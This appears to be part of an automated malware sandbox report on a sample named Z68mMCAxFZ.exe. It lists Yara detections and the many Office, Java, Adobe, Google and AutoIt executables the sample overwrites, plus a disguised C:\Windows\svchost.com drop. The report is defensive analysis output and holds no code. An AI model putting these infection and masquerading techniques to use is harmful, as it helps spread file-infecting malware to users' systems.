                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                  Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE, type: DROPPED
                  Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, type: DROPPED
                  Source: Yara match | File source: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe, type: DROPPED
                  Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\ChromeSetup.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, type: DROPPED
                  Source: Yara match | File source: C:\Windows\svchost.com, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe, type: DROPPED
                  Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                  Source: Yara matchFile source: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE, type: DROPPED
                  Source: Yara matchFile source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, type: DROPPED
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\protocolhandler.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SETLANG.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\PPTICO.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DWTRIG20.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\FLTLDR.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\LICLUA.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{49697869-be8e-427d-81a0-c334d1d14950}\VC_redist.x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSREC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\WORDICON.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Users\user\AppData\Local\Temp\CR_94EB1.tmp\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\XLICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOSQM.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\lynchtmlconv.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\OLicenseHeartbeat.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaws.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Uninstall.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{f65db027-aff3-4070-886a-0d87064aabb1}\vcredist_x86.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CSISYNCCLIENT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\ODeploy.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\VC_redist.x64.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\SELFCERT.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; System file written: C:\Program Files (x86)\Common Files\microsoft shared\DW\DW20.EXE
Drops PE files with a suspicious file extension
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File created: C:\Windows\svchost.com
Drops executable to a common third party application directory
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\setup.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Users\user\Desktop\Z68mMCAxFZ.exe; File written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
